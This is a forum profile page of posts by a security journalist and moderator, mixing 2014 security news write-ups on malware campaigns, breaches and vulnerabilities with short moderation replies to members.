Posts by happygeek

Welcome Scott. You'll be fed up of all my welcomes, what with PM and in forum now :)

Google has been quick to blacklist domains implicated, most often unwittingly, in the distribution of what has become known as the SoakSoak malware campaign courtesy of soaksoak.ru being the first domain in the redirection path it used. With 11,000 domains blocked over the weekend, you might be forgiven for thinking that it's another WordPress hosting sites security problem sorted before it can do any harm. However, most experts I have spoken to would seem to agree that 11,000 domains is just the tip of this particular iceberg and the actual number of soaksoak impacts on WordPress specific sites is in the hundreds of thousands spectrum.

According to security outfit Sucuri, which has been leading the analysis of this outbreak, it would appear that the attack vector can be traced back to the RevSlider plugin vulnerability that Sucuri disclosed some months back now. Unfortunately, as is the way with such things, many WordPress site operators do not seem to have addressed the issue and continue to use premium plugin. This isn't surprising given, as Sucuri points out "it’s not something everyone can easily upgrade and that in itself becomes a disaster for website owner". What's more, the plugin is bundled with themes and so some owners won't even know they have it.

Whatever, the supersoaker effect is quite clear: this is a local file inclusion attack methodology which means that a remote attacker can download any local file they fancy from the target server. …

I prefer forums, some people prefer the old mailing list approach. DaniWeb offers both options, you chose the wrong one :)

An increasing number of my acquaintances seem to be in the habit of buying cheap Android smartphones when in China on business and, increasingly, from online auction sites. More often than not these will be clones of flagship models but without the flagship price tag; however, cheap is not always cheerful. I've seen some of these devices with their look-alike operating systems and their flimsy construction, and given a quick once over have to say I wouldn't trust them with my calls, texts and data. That level of mistrust appears to be well founded, not least because it would seem that some of these cheap clone phones are coming pre-loaded with malware called DeathRing.

According to mobile security outfit Lookout this is the second time this year that an outbreak of DeathRing has been spotted. The Chinese Trojan, Lookout says, is coming pre-installed on a whole bunch of cheap Chinese phones which are most popular in the Asian and African regions. The company does admit, it has to be said, that the volume when it comes to DeathRing detection is 'moderate' although it doesn't give any actual numbers. Lookout does insist that active detections are being picked up globally though, which makes the threat both viable and concerning.

DeathRing, as the name suggests, pretends to be a pre-loaded ringtone app but in actual fact is actually a malware conduit for content downloaded from a central command and control server. SMS content can be pushed to the handset, for …

A group describing itself as "DDoS kings" who "just want to watch the world burn" has claimed responsibility for taking the Microsoft Xbox Live network down for an hour or two earlier today. The Lizard Squad, posting from a Twitter account called LizardPatrol, published a message warning that "Microsoft will receive a wonderful Christmas present from us" and say that taking Xbox Live offline was "a small dose of what's to come on Christmas."

The downtime impacted upon users of both the Xbox 360 and Xbox One, returning an 80151909 error when trying to connect to Xbox Live. According to Microsoft support, this error code occurs when "Xbox Live profiles can't be downloaded" and indicates a temporary profile download failure. Seeing as there were no issues being reported on the official Microsoft site regarding the Xbox Live network, which is usually the case, it would suggest that a DDoS attack could have been the cause.

At the time of writing Xbox Live appears to be back up and functioning normally once more. Whether this was, indeed, a DDoS attack and if it is indicative of more to come is as yet unknown. If it does prove to be the case then the fact that the group claiming responsibility says it is doing it for kicks is a little worrying. Of course, it could just as easily be a group of bored kids jumping on an entirely unrelated downtime event for the kudos. Only …

What is Google and what is it used for?

The annual 'Black Friday' discounted shopping storm is no longer just an American event; it's hit the UK like a hurricane today. Last night police were called to four different supermarkets with heavily discounted televisions after large crowds started to gather for the midnight opening. At one Asda store (a Walmart owned UK supermarket chain) there was fighting as shoppers opted to get physical in order to secure that electrical bargain.

Then, both the Tesco supermarket and Currys PC World electrical superstore websites buckled under the pressure of would-be shoppers keen to get an online bargain. Next it was clothing retailer Topshop, and this morning the website of high street video game retailer 'Game' was down and out due to "the overwhelming response to our Black Friday offerings" apparently.

Of course, truth be told, the reason why these online sites were unavailable is a lot simpler. They underestimated the demand, and they under-budgeted for the resources required to keep their servers up. It's still only mid-morning here in the UK and I can confidently predict that more retail websites will be going down as Black Friday continues; and most likely into the Cyber Monday discount shopping continuation as well.

Archie Roboostoff, Borland Solutions Portfolio Director at Micro Focus, reckons that research points towards some 44 per cent of CIOs being well aware of the precise events that drive such peak-traffic loads, yet relatively few perform any kind of performance load testing in advance of them. …

Ever wondered why the bad guys continue throwing malware in your direction? The obvious answer is the correct one: because they make money from doing it. On Thanksgiving Day, as all others across the year it would seem, they can be thankful for the high profit to be raked in from using readily available malware purchased within the dark market.

Kaspersky Lab researchers have been doing the math, and their figures suggest that when comparing the cost of the most common hacker tools with the cold cash stolen using them the profit is around 20 times greater than the outlay. By way of example, in order to set up an out of the box social network clone together with a spam mailing list linking victims to it would cost as little as $150 according to the researchers; with just 100 targets getting caught the phishing perpetrators could expect a return of up to $10,000 on average.

Or how about mobile Trojan which 'bricks' a smartphone until a ransom is paid? These are rather more expensive to purchase, about $1000 in fact. However, with unlocking 'fees' set at $200 (and victims are generally happy to pay to get back access to their photos, music and contacts which have not been backed up separately - let alone the problem of resetting a device for the kind of naive, technically speaking, user caught by such malware) it only takes 100 victims to realise a $20,000 return.

However, the Kaspersky research would seem to …

You can look to see who is replying and determine whether they are to be trusted, in exactly the same way you do when interacting with anyone in the real world. Just as you would trust your professor to give an accurate answer (probably) and maybe not so much the drunk chap on the street corner (depending upon the question of course) so you will probably trust a developer on DaniWeb who has a high reputation and has been helping others for a long period more than you would a newbie with no rep called 'lovepotionsforsale' and a sig link pointing to a site selling witchdoctor services...

Think that macro viruses written in VBA (Visual Basic for Applications) are just something that people using the Internet a couple of decades ago had to worry about? Think again. Word macro attacks never went away, they just went into decline. New evidence suggests they could be making something of a comeback though. Coupled with research showing how non-English speaking recipients are being targeted by phishers using this technique, it makes for worrying reading some 15 years after Melissa struck fear into the email using world.

Whenever I hear non-English and phishing uttered in the same breath, I tend to think the speaker is talking about the scammer rather than the attack message itself. The number of emails that appear in my spam and malware filtered folders which have patently obviously come from the keyboard of a non-English speaker far outweigh that have not. However, the language of phishing itself has pretty much always been English for one very good reason: it represents the largest attack surface for the least effort. Of course, there are always exceptions and targeted attacks (also known as spear phishing) are more likely to be crafted in whatever language is thought to be spoken by the recipient based upon the location of that target mark. One thing is for sure, most security researchers will agree that malicious URLs in email tend to be a lot more prolific in English language speaking recipient countries than elsewhere.

Which doesn't mean you are safe if, for …

Use the search box top right, or scroll through recent forum posts, or use Google and you will find your answer...

Closing this thread now before it turns into a sigspam fest.

Fingers, if not legs, crossed for you ;)

Why are you asking when you are a web developer/design outfit which offers SEO services according to the page you link to in your sig? Surely you would know this stuff already, if not why would anyone hire you?

Viruses have not been much of a problem for years now. Malware and increasingly privilege escalation attacks, on the other hand, have.

As the title says, I'm just bigging myself up here but am stoked to have won the award for 'Best Investigative Feature of the Year' at the BT Information Security Journalism Awards in London yesterday. I'm particularly pleased as I beat off competition from BBC News, The Guardian and The Telegraph. That's the 8th year straight I have been shortlisted at the event, and the 8th award I've picked up there over the years since it started in 2006. Sadly it wasn't for something published on DaniWeb (although I have won the same award in the past for a news story which I broke here) but rather an InfoSecurity Magazine investigation into the value of vulnerability data.

Back to reality today, with a bunch of deadlines to meet...

You might be forgiven for thinking that the iPhone is the most secure of the smartphone choices, especially if you've opted for a 5S or above with that fingerprint reader for secure ID and iOS 8 as the most robust of operating systems. Forgiven, but wrong; despite the claims from Apple that iOS is designed with advanced security technologies built in rather than bolted on. If you go by the results of the annual PWN2OWN hacking competition which was held in Tokyo last week, then iOS fell behind Android and to add to the jaw-dropping amongst many pundits Android in turn fell behind Windows Phone which proved the hardest to hack platform of all.

It's not been the best of months for Apple as far as iOS security reputation goes. First the security researchers disclosed the Masque Attack which has the potential to leave business users at risk. Essentially, this means that apps distributed using enterprise provisioning profiles are not subject to the normal Apple security review process roadblocks, and malicious apps can be installed over the top of (and replacing) genuine ones if they share the same bundle identifier. Apple has rather waved this off as a non-event, but if you read the FireEye disclosure report you will see that the company claims to be aware of in the wild attacks taking place.

And then came the Mobile PWN2OWN 2014 results, with a South Korean team managing to pwn the iPhone 5S by …

Depends if your site has links to or is involved with 'illegal' TV/movie content I would imagine. Otherwise, nothing much to see here...

What is the difference between a real question and a pointless post?

Sigh, didn't take long for that new account to be banned.

Making threats of getting your friends to take down DaniWeb is another sign of your immaturity.

Probably a bit late now, don't you think, as that was from NINE MONTHS ago...

Blimey, the 'Top SEO Company in India' doesn't know how to Google. Whatever next...

Quick reminder of the rules:

Do not ask for help to pursue any illegal activity including, but not limited to, hacking and spamming

The UK's National Crime Agency (NCA) has said that it has dealt a "major blow to dark web markets." In a statement issued on the 7th November the NCA says that a coordinated operation between law enforcement agencies in Europe and the US has "targeted market places for illegal commodities on the dark web" and as part of this six people in the UK were arrested.

Amongst those arrested in strikes closely coordinated with international partners in the US were the suspected administrators of Silk Road 2.0, the Tor accessed drugs and firearms market place. The NCA statement also claims that "significant vendors of illegal drugs through the dark web" were also arrested and that "technical infrastructure which is key to the hosting of illegal market places on the dark web" were taken down.

So what will the impact of this operation be? That's hard to say, not least because it has been a commonly held belief that Silk Road 2.0 was compromised from the get go following the takedown of the original Silk Road site and arrest of alleged owner Ross William Ulbricht who is said to have been the infamous Dread Pirate Roberts. At the time I said that "it would be a brave, or foolhardy, person who started trading in illegal goods using it" and that prediction appears to have been accurate.

Mind you, according to a report by security investigative journalist Brian Krebs it seems that plenty of dealers were …

American technology companies are by implication evil, and aiding terrorist groups such as Islamic State/ISIS according to a number of highly influential but terribly ill-informed Western players. Apple and Google have become the command and control networks of choice for terrorists and implementing full-device encryption by default will help Islamic State to plan future attacks, if we are to believe certain spy masters and career politicians.

I use the term 'terribly ill-informed' wisely, and am aware that I will no doubt get plenty of flack from those who think the head of the UK Government Communications Headquarters (GCHQ) or Director of the FBI may just be better informed than myself when it comes to terrorist activity. However, I will stick to my guns and explain why I'm taking the stance that I am here.

But first let's examine what's been said an by whom. It kicked off with James B. Comey, Director of the Federal Bureau of Investigation, who said in a speech last month that "those charged with protecting our people aren't always able to access the evidence we need to prosecute crime and prevent terrorism even with lawful authority." Comey spoke of having the legal authority to intercept and access communications and data, but often not the technical ability to do so. Excuse me for saying you could have fooled me, given the Snowden revelations and all that has followed regarding how security agencies are throwing money at technology programs for cracking …

So, today is 'World Paper Free Day' apparently and I'm not sure whether it's appropriate to buy a card in the circumstances. Joking aside, what I am sure of is that such Hallmark days do provide an opportunity for press releases to be thrown in my general direction. And so it was that yesterday one pops into my inbox proclaiming "Paper revealed as the top threat to information security." What rot! Before even reading a word of the release itself I knew that it was going to be rubbish that, if it were on paper, I would screw into a ball and with an athletic flounce chuck into the bin. I was not wrong, and here's why.

"Paper the top threat to information security say two-thirds of UK firms. Iron Mountain/PwC study reveals just 15 per cent have a team focused specifically on paper protection" screams the strap line. "The handling of paper documents is the single greatest threat to the protection of information, according to a recent study by storage and information management company Iron Mountain and PwC launched ahead of World Paper Free Day on November 6th" it continues, before informing me that 66 per cent of mid-sized companies regard the management of information on paper as a serious security risk, and that's more than double the number that fear external threats to digital content such as hacking and malware.

Can you spot the two big problems there? The first is obvious, and that is this …

EPoX went out of business a couple of years back so you cannot approach them, and a quick search of the usual suspects such as MOBOT has not returned anything other than a spec sheet here.

Sorry, looks like you are out of luck unless you can find a fellow owner who still has access to a manual.

Alternatively, what problems are you having that you need the manual to help with? It may be that DaniWeb members can help without the specific manual being required.

Sorry Jack, but you are too young to use DaniWeb in that case. So your account will be closed. Feel free to reapply when you are 13.

Minimum Age Requirement

In compliance with the U.S. Coppa Act, no one under the age of thirteen (13) is permitted to register on these forums. If someone under the age of 13 does register, it is understood that they are doing so against DaniWeb's policies and without DaniWeb's knowledge

Jack, probably best not to rant about spelling and then type "how do you secure you're network" when it should be "your network" don't you think? ;-)

Although based in New York, DaniWeb is very much a global community. I'm from England, for example, and our moderator Diafol (who will be well known to anyone who has ever browsed the PHP forum) is a Welshman through and through. I mention this as last week I went on a tour of IT security and military tech companies as the guest of the Welsh Government, who were keen to demonstrate how South Wales in particular has become something of a cyber-security cluster in the UK.

My trip was centred in Cardiff, best known to sci-fi geeks the world over as home to Doctor Who. The BBC has been filming there since the series returned to television in 2005, and the city is also where you can find the Doctor Who Experience exhibition until at least 2017. However, Cardiff is the Welsh capital and also sits at the lively beating heart of an IT Security hub in South Wales. The Welsh Government have made it very clear that the intention is to attract security start-ups and established players alike as part of a broader technology business strategy in the country. This aim can be extended beyond the entrepreneurial basics though; there's a will here to make South Wales one of the most secure places in the world to do business, through the building of cyber security skills and resources.

Cardiff is in the final stages of getting an Internet Exchange, one of only a …

<rubberman> Cain & Abel is a password cracking tool.

<Muhammad68> What was the point of that?

<chalobe.lefa> Please take note of the rules, especially the one that states: "Do not ask for help to pursue any illegal activity including, but not limited to, hacking and spamming" - please clarify your question bearing this rule very carefully in mind.

What?

Let me rephrase that: WHAT?

Probably because it's not compatible with Windows 7, see: http://answers.microsoft.com/en-us/windows/forum/windows_7-hardware/how-do-i-install-a-hp-laserjet-1010-printer-using/4fbb4816-3ffb-4b49-897e-c800d0a0a9e0

which also includes a workaround.

I assume you have contacted/searched HP for a Windows 7 driver in case one is now available?

A Drupal security advisory, SA-CORE-2014-005, rather embarrassingly states that:

Drupal 7 includes a database abstraction API to ensure that queries executed against the database are sanitized to prevent SQL injection attacks. A vulnerability in this API allows an attacker to send specially crafted requests resulting in arbitrary SQL execution. Depending on the content of the requests this can lead to privilege escalation, arbitrary PHP execution, or other attacks. This vulnerability can be exploited by anonymous users.

I think that's a whoops, with an uppercase W. The highly critical SQL injection vulnerability is to be found in versions of Drupal 7 prior to 7.32 and users should immediately upgrade to 7.32 to fix the problem. The urgency for updating is confirmed by the fact that proof of concept sharing has been spotted on assorted dark web forums and there is at least one known live exploit out there.

Dwayne Melancon, CTO at Tripwire, told me that "the ever-increasing use of Open Source and third-party software components means this isn’t the last time we will see this kind of vulnerability – diligence is critical, and this is as much a supply chain issue as it is a technical one. This situation shares similarities with other recently discovered exploits such as ShellShock, Heartbleed, and the Poodle SSL vulnerability in that it is something that has been around for quite a while but just wasn’t known. Exploits, such as this one, that enable arbitrary command execution by unauthenticated remote users …

Actually Dropbox not hacked, and the majority of the logins posted so far either are not related to Dropbox or are from inactive accounts. Looks like yet another case of someone posting a database of stolen credentials that were being reused by people across sites and services, and the 'hacker' was trying all the major players to see if anything hit. Dropbox states it had already reset passwords on all accounts it had identitied at being at potential risk from this particular non-exploit.

Done :)

So, Microsoft and iSIGHT uncovered another 0-day vulnerability; this time
impacting all supported versions of Microsoft Windows and Windows Server 2008 and 2012. iSIGHT has detailed in the wild exploits of the vulnerability, and points the finger of suspicion at state-sponsored Russian interests. The Dallas-based cybersecurity outfit explained that the exploit (dubbed Sandworm) showed visibility targeting Ukranian government organisations, Polish energy businesses and US academic organisations as well as NATO itself, and warned that there is an obvious potential for much broader targeting from the same and new threat actors.

The researchers have been tracking at least five distinct Russia-based intrusion teams according, one of which was based around mobile malware use and targeted US and European intelligence communities as well as jihadists and rebels in Chechnya. The Sandworm Team, however, has been active through late 2013 and throughout 2014 targeting victims with specific lures related to the Ukranian conflict via 'traditional' spear phishing techniques involving malware infected document attachments. The newly observed Microsoft Windows 0-day is the latest weapon to be deployed.

iSIGHT has seen evidence of the group attacking NATO with other exploits during December 2013, and more recently with spear-phishing attacks during the NATO summit on Ukraine held in Wales. In September it spotted that the spear-phishing attacks were reliant upon exploitation of this new 0-day vulnerability which impacted all supported versions of Microsoft Windows (from Vista SP2 to Windows 8.1) and Windows Server 2008 and 2012 and weaponised with an infected PowerPoint document. …

In what article? You are posting a lot of nonsense all over the place, please cease and desist...

HINT: we don't do your homework for you.

HINT: show us your code, explain what you are stuck with, and we will take it from there...

Number four sums it up. Also applies to posting stuff on DaniWeb you don't want your teacher/employer/wife to see...

My worse fears confirmed. We will miss you Mel. The world of programming will miss you Mel. One of the most helpful and knowledgeable guys ever to have blessed DaniWeb with his presence.

:'-(

At the start of the year, DaniWeb reported how Snapchat, the self-destruct photo messaging service, had been hacked and information regarding 4.5 million users had been stolen. Fast forward to now, and Snapchat is again in the mire: nude images have started to appear on 4chan which have been stolen from Snapchat accounts.

According to new reports images from 200,000 Snapchat accounts have been stolen and are now starting to appear online. Snapchat itself denies that its own servers have been breached, however it does confirm that accounts have been hacked. This rather confusing admission would appear to be due to Snapchat account holders using third party apps to send and receive their photos, something that Snapchat prohibits in the terms of use because of the security risk. Indeed, Snapchat has been successful in having such apps removed from Google Play and the App Store, but inevitably there are plenty out there and plenty in use.

In case you have not come across Snapchat before, it's basically an application driven service which enables users to post images, video and text on a time limited basis to a group of recipient users. These 'snaps' self-destruct, sort of, after 10 seconds. That is, there is a 10 second window during which the recipient can see them after which they are no longer available for viewing. Unless the recipient saves it using a screengrabber, or uses a different app to access the service, and so on. The fact that …

Did you not read the reply, which gives the information you seek, before posting? Or are you just replying to everything regardless and not actually bothering to read the conversation first? At the moment, it certainly seems like the latter.

Sometimes less is more...

Do you have any deadlines written into the contract/agreement that you have with her? If you are concerned with the time being taken then chase her up, after all you are paying her for a service here...

Useful information about the evolution of Shellshock attack payloads to be found here:

http://research.zscaler.com/2014/10/bashed-evolution-of-shellshock-attack.html

As well as being CEO of penetration testing specialists High-Tech Bridge, Ilia Kolochenko is also perhaps unsurprisingly a white hat hacker of some repute. Equally unsurprising is the fact that he has warned that security vulnerabilities in leading CMS platforms such as Drupal, Joomla and WordPress are effectively leaving the security door wide open for hackers to walk through.

Kolochenko refers to the threat posed by old plugins, passwords and extensions as being the 'Achilles heel of popular CMS' and for good reason. High-Tech Bridge regularly tests popular CMSs via the ImmuniWeb online penetration testing service and equally regularly, sadly, discovers vulnerabilities therein. It follows a strategy of responsible disclosure, which I'm all in favour of, whereby any vulnerabilities are reported to the vendor with immediate effect but no public disclosure (other than a broad statement without exploitable details) is made for three weeks. This gives the vendor ample time to do something about it, and should encourage those who are a bit slow off the mark to focus attention on a fix. All without alerting the bad guys as to how to create code to exploit the hole.

This is obviously a good thing for all of us, with many Joomla and WordPress vulnerabilities coming to light this way, and being patched before any damage can be done. Unfortunately, black as well as white hat hackers do the research and it's always something of an ongoing race to find the holes first. The difference being that the …

It's a hark back to the past.

Ten is the number of people who liked Windows Me, and Microsoft is aiming on bettering that after Vista and 8 failed to make it.

The news that JPMorgan Chase & Co, which is the largest of the US banks with a reach that extends to half of all American households, has been breached will surprise nobody. At least not in the sense that this is old news, with a disclosure of the event happening in August. The actual breach was discovered by the bank back in July, and is thought to have been active for at least a month prior to that. What is surprising, however, is that a financial organisation of such a size and reputation should fall victim to such a breach in the first place. One highly placed individual in the IT security business told me over a pint that "if it can happen to JP Morgan then, frankly, it can happen to anyone" and that wasn't just the drink talking. Also surprising was the claim that a million accounts had been compromised during the breach, a claim made during the initial disclosure.

Just before the weekend the surprise level went off the scale as the New York-based bank revealed, via a regulatory filing, that the actual numbers were a little higher. How much higher? How does 76 million households and 7 million small businesses higher strike you? Of course, this can be played down by comparing it to other mega-breach statistics: the Target attack last year hit 110 million accounts, and the more recent eBay hack 145 million. That doesn't make the JP Morgan numbers any the less striking though, …

Get a virtual divorce?

More news from the security research labs:

FireEye has discovered that cyber attackers have already mobilised to use BASH Shellshock bug and suspect that they may be conducting initial dry runs in preparation for a real, potentially larger scale, attack. Some of the suspicious activity appears to be originating from Russia, although there has been frenzied activity from all over the world. It’s believed that it’s only a matter of time before attackers exploit the vulnerability to redirect users to malicious hosts, which can result in further compromise. So far, the Common Gateway Interface vector (an interface between a web server and executables that produce dynamic content) has received the bulk of the focus from attackers, however, the reach of the BASH Shellshock bug doesn’t stop at web servers. Any application that relies on user-controlled data to set OS-level environment variables and then invokes the shell from that same context can trigger the vulnerability. In other words, web applications relying on a specific type of user input can be manipulated to make clients (i.e., consumers) vulnerable to attack.

15 mins. ROFL...

Nobody here is going to do your homework for you buddy. Tell us exactly what you are stuck with and someone might be able to point you in the right direction.